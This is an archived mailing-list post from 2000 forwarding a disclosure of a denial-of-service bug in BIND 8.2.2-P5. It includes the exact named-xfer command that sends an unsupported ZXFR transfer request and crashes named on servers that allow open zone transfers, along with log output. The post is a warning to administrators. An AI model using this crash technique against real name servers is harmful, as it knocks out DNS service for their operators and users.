From owner-freebsd-isp Wed Nov 8 10:59:38 2000 Delivered-To: freebsd-isp@freebsd.org Received: from gate.trident-uk.co.uk (mail.trident-uk.co.uk [195.166.16.10]) by hub.freebsd.org (Postfix) with ESMTP id B62E537B479 for ; Wed, 8 Nov 2000 10:59:34 -0800 (PST) Received: from [194.207.93.139] by gate.trident-uk.co.uk for freebsd-isp@freebsd.org id SAA21018; Wed Nov 8 18:57:48 2000 Organization: Psi-Domain Ltd. Subject: BIND 8.2.2-P5 Possible DOS Date: Wed, 8 Nov 2000 19:02:24 +0000 X-Mailer: KMail [version 1.0.28] Content-Type: text/plain MIME-Version: 1.0 Message-Id: <00110819041604.01782@freefire.psi-domain.co.uk> Content-Transfer-Encoding: 8bit To: freebsd-isp@freebsd.org From: Jamie Heckford Reply-To: heckfordj@psi-domain.co.uk Sender: owner-freebsd-isp@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Verified this earlier... make sure your nameservers are configured correctly!! Nov 8 19:00:47 atlas named-xfer[78583]: [x.x.x.x] no SOA found for xxx, SOA query got rcode 3, aa 1, ancount 0, auc ount 1 Nov 8 19:01:05 atlas named[276]: unsupported XFR (type ZXFR) of "xxx" (IN) to [x.x.x.x].1368 Nov 8 19:01:21 atlas named[276]: d_rcnt-- == 0 Nov 8 19:01:21 atlas /kernel: pid 276 (named), uid 53: exited on signal 6 Nov 8 19:01:21 atlas named[276]: d_rcnt-- == 0 ---------- Forwarded Message ---------- Subject: BIND 8.2.2-P5 Possible DOS Date: Tue, 7 Nov 2000 13:40:49 +0100 From: "Fabio Pietrosanti (naif)" Hi, playing with bind and ZXFR feature ( zone transfer compressed with a possible insecure execlp("gzip", "gzip", NULL); ), i discovered a Denial Of Service against Bind 8.2.2-P5 . By default Bind 8.2.2-P5 it's not compiled with ZXFR support unless you define it with #define BIND_ZXFR so it will refuse any ZXFR transfer, because it doesn't support it. But now what appens? Look here... ################################ zone to transfer: zone.pippo.com dns server: dns.pippo.com 192.168.1.1 me: naif.gatesux.com 10.10.10.10 I send a Zone Trasnfer request using "-Z" switch with means that i wish to use ZXFR. dns.pippo.com does'nt support ZXFR and have "allow-transfer{}" not configured, so everyone could ask him for *.zone.pippo.com ... [~/bind/src822p5/bin/named-xfer] $ ./named-xfer -z zone.pippo.com -d 9 -f pics -Z dns.pippo.com named-xfer[29297]: send AXFR query 0 to 192.168.1.1 named-xfer[29297]: premature EOF, fetching "zone.pippo.com" On the server's log: Nov 7 11:19:09 dns.pippo.com: named[188510]: approved ZXFR from [10.10.10.10].2284 for "zone.pippo.com" Nov 7 11:19:09 dns.pippo.com: named[188510]: unsupported XFR (type ZXFR) of "zone.pippo.com" (IN) to [10.10.10.10].2284 Then the server "*** CRASHED ***" . I should assume that bind 8.2.2-P5 it's vulnerable ( Please someone test and confirm this kind of dos) and bind-9.0.0 has no support for ZXFR . [~/bind] $ find src822p5/ -type f -exec grep -i zxfr \{\} ';' | wc -l 234 [~/bind] $ find bind-9.0.0/ -type f -exec grep -i zxfr \{\} ';' | wc -l 0 A lot of DNS Server are misconfigured, and allow zone-transfer to any, so they are dossable... naif naif@itapac.net ------------------------------------------------------- -- Jamie Heckford Chief Network Engineer Psi-Domain - Innovative Linux Solutions. Ask Us How. =================================== email: heckfordj@psi-domain.co.uk web: http://www.psi-domain.co.uk/ tel: +44 (0)1737 789 246 fax: +44 (0)1737 789 245 mobile: +44 (0)7779 646 529 =================================== To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-isp" in the body of the message